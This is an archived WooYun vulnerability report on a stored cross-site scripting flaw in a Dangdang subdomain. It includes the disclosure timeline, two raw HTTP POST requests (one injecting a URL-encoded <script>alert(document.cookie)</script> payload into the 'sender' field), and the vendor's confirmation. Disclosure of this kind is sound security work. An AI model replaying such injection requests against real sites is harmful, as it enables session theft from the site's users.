当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040508

漏洞标题:当当网某分站存储型xss

相关厂商:当当网

漏洞作者: D&G

提交时间:2013-10-21 13:20

修复时间:2013-12-05 13:21

公开时间:2013-12-05 13:21

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-21: 细节已通知厂商并且等待厂商处理中
2013-10-21: 厂商已经确认,细节仅向厂商公开
2013-10-31: 细节向核心白帽子及相关领域专家公开
2013-11-10: 细节向普通白帽子公开
2013-11-20: 细节向实习白帽子公开
2013-12-05: 细节向公众公开

简要描述:

当当某分站存储型xss

详细说明:

http://robot.dangdang.com/WebIm/page/officialPortal.jsp
参考: WooYun: 当当网某分站存储型xss漏洞一枚
当然,这里已经修复了。不过依然存在问题,可以绕过。感觉这个页面是内部用的,没必要开放访问吧。。
点击增加新的话题,可以添加标题和内容:

dangdang1.png


发送如下post请求:

POST /WebIm/JQueryAjaxServlet?t=1382331386011 HTTP/1.1
Host: robot.dangdang.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: application/json, text/javascript, */*
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://robot.dangdang.com/WebIm/page/officialPortal.jsp
Content-Length: 261
Cookie: JSESSIONID=2798D90285C59C9F7DBABFFEFD5BF140
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=officialPortalAction&method=fetchOfficialPost&arg=%7B%22extAttr%22%3A%7B%22company_id%22%3A%223%22%2C%22user_name%22%3A%22%22%2C%22title%22%3A%22qqqqq%22%2C%22postType%22%3A%220%22%2C%22sender%22%3A%22%22%2C%22context%22%3A%22qqqqq%22%2C%22replyid%22%3A%22%22%2C%22startCount%22%3A0%2C%22clientUid%22%3A%22fa1ec384-95a3-49fd-bebe-2703b9692b97%22%2C%22clientUserName%22%3A%22guest%22%7D%7D


arg参数为传递到服务器的内容。经过分析查询时的返回内容:

\"id\":\"45\",\"sender\":\"\",\"title\":\"1\",\"eggs\":0,\"context\":\"2\",\"showStatus\":0,\"flowers\":0,\"subList\":[],\"replyID\":\"\",\"replycode\":\"\"},{\"followNum\":\"0\",\"company_id\":\"3\",\"sendTime\":\"2013-10-21


发现除了标题和内容,(title,context)外,还会返回多个参数值,比如company_id,sender.而post的参数中恰好也存在这些参数。于是,在post请求中修改sender参数为xss代码。
发送如下请求:

Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://robot.dangdang.com/WebIm/page/officialPortal.jsp
Content-Length: 802
Cookie: JSESSIONID=2798D90285C59C9F7DBABFFEFD5BF140
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=officialPortalAction&method=addOfficialPost&arg=%7b%22%65%78%74%41%74%74%72%22%3a%7b%22%63%6f%6d%70%61%6e%79%5f%69%64%22%3a%22%33%22%2c%22%75%73%65%72%5f%6e%61%6d%65%22%3a%22%22%2c%22%74%69%74%6c%65%22%3a%22%71%71%71%71%71%22%2c%22%70%6f%73%74%54%79%70%65%22%3a%22%30%22%2c%22%73%65%6e%64%65%72%22%3a%22%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%22%2c%22%63%6f%6e%74%65%78%74%22%3a%22%71%71%71%71%71%22%2c%22%72%65%70%6c%79%69%64%22%3a%22%22%2c%22%73%74%61%72%74%43%6f%75%6e%74%22%3a%30%2c%22%63%6c%69%65%6e%74%55%69%64%22%3a%22%66%61%31%65%63%33%38%34%2d%39%35%61%33%2d%34%39%66%64%2d%62%65%62%65%2d%32%37%30%33%62%39%36%39%32%62%39%37%22%2c%22%63%6c%69%65%6e%74%55%73%65%72%4e%61%6d%65%22%3a%22%67%75%65%73%74%22%7d%7d


果然没有过滤。

dangdang2.png

漏洞证明:

dangdang2.png

修复方案:

没用的页面屏蔽了吧。

版权声明:转载请注明来源 D&G@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-10-21 14:09

厂商回复:

感谢对当当网安全的关注,已经联系业务部门对此问题进行修复。

最新状态:

暂无